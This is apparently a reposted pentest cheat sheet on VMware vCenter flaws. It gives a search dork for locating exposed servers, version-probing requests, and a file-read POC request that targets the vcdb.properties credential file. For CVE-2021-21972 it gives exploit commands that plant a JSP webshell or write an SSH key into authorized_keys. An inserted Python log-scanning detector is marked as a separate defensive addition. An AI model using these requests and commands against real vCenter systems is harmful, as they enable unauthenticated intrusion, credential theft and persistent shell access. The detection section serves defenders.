
Vcenter LH Exploit

Time: 2024-02-22 15:13:12  Views: 16
Tags: LH Exploit version 2021 file path Vcenter CVE VMware

Common Vulnerabilities

Fingerprint

title="+ ID_VC_Welcome +"

Finding the vCenter version

Method 1

Path: /sdk/vimServiceVersions.xml

Method 2

By calling the SOAP API of the VMware vSphere component, its version information can be obtained. The XML request body is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>

Arbitrary file read

Impact version: VMware vCenter Server <=6.5.0

Fofa Dork: title="ID_VC_Welcome" 

VMware vCenter has an arbitrary file read vulnerability that can be used to read the management account password from the vCenter configuration and thereby take control of the vCenter platform.

The database configuration file is located in a different directory depending on the system version. The official documentation lists the locations briefly:

vCenter Server 5.5 or lower:

  • Windows 2008 - C:\ProgramData\VMware\VMware VirtualCenter
  • Other Windows versions - C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\

vCenter Server 6.0, 6.5, 6.7:

  • C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx

POC: 

GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}

CVE-2021-21972

The vROps plugin (com.vmware.vropspluginui.mvc), which is enabled by default, allows unauthenticated access to the uploadova interface of the ServicesController class; a path traversal during decompression of the uploaded file can be used to write a file into a specific directory and get a shell.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U1c
  • 6.7 <= vCenter Server < 6.7 U3l
  • 6.5 1e <= vCenter Server < 6.5 U3n
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.1.2

Probe path: /ui/vropspluginui/rest/services/uploadova

If requesting the path above returns 404, the vulnerability is not present; a 405 response means the endpoint exists and the host may be vulnerable.

Windows machine:

https://github.com/horizon3ai/CVE-2021-21972.git

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (target address)
-f (file to upload)
-p (webshell path after upload; the default does not need to be changed)

The uploaded file is reachable at https://x.x.x.x/statsreport/gsl.jsp

The full path on disk is

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

Linux machine

1. Write a public key into authorized_keys (port 22 needs to be open)

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub
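As an added defensive example (not part of the original post or of any tool it links), the following Python script runs detection logic over constructed web-server access-log lines for the paths discussed above: the /eam/vib?id= file-read POC, the uploadova probe (405 on GET) and upload (POST), and access to a JSP under /statsreport/. The Apache combined log layout, the sample IPs and the label names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in Apache combined style (assumption: the real
# vCenter web-server log layout differs; only the request line is parsed here).
SAMPLE_LOG = r"""
10.0.0.5 - - [22/Feb/2024:15:13:12 +0000] "GET /ui/login HTTP/1.1" 200 5120
10.0.0.9 - - [22/Feb/2024:15:14:01 +0000] "GET /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties HTTP/1.1" 200 812
10.0.0.9 - - [22/Feb/2024:15:15:30 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 405 0
10.0.0.9 - - [22/Feb/2024:15:15:41 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 0
10.0.0.9 - - [22/Feb/2024:15:16:02 +0000] "GET /statsreport/gsl.jsp HTTP/1.1" 200 44
10.0.0.7 - - [22/Feb/2024:15:17:00 +0000] "GET /sdk/vimServiceVersions.xml HTTP/1.1" 200 1270
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(method, target, status):
    """Label one request against the vCenter paths discussed above; None if benign."""
    parts = urlsplit(target)
    path = parts.path
    if path == "/eam/vib":
        # /eam/vib?id=<path> is the file-read POC: a traversal, a drive letter or a
        # .properties target (vcdb.properties holds the DB credentials) is suspect.
        ident = unquote(parse_qs(parts.query).get("id", [""])[0])
        if ".." in ident or re.match(r"^[A-Za-z]:", ident) or ident.lower().endswith(".properties"):
            return "eam-arbitrary-file-read"
    if path == "/ui/vropspluginui/rest/services/uploadova":
        # CVE-2021-21972: GET -> 405 shows the plugin is exposed; POST 200 is an upload.
        return "CVE-2021-21972-upload" if method == "POST" and status == 200 else "CVE-2021-21972-probe"
    if path.startswith("/statsreport/") and path.lower().endswith(".jsp"):
        # The Windows write target named above is .../webapps/statsreport/gsl.jsp.
        return "statsreport-jsp-access"
    if path == "/sdk/vimServiceVersions.xml":
        return "version-endpoint"  # informational: legitimate SDK clients hit this too
    return None

def scan(log_text):
    """Return (client_ip, label) for every suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["target"], int(m["status"]))
        if label:
            findings.append((m["ip"], label))
    return findings
```

Correlating the labels per client IP (a probe followed by an upload and then a JSP hit from the same source) is the sequence worth alerting on; the version-endpoint label alone is noise.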

CVE-2021-21985

The Virtual SAN Health Check plugin (vsan-h5-client.zip), which is enabled by default, allows unauthenticated access to the /rest/* interface; unsafe reflection calls there can be used to achieve RCE.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U2b
  • 6.7 <= vCenter Server < 6.7 U3n
  • 6.5 <= vCenter Server < 6.5 U3p
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1

https://www.geekby.site/2022/05/vcenter%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#3-%E5%90%8E%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95

For the follow-up steps, please refer to the link above.

From: https://www.cnblogs.com/lisenMiller/p/18027388
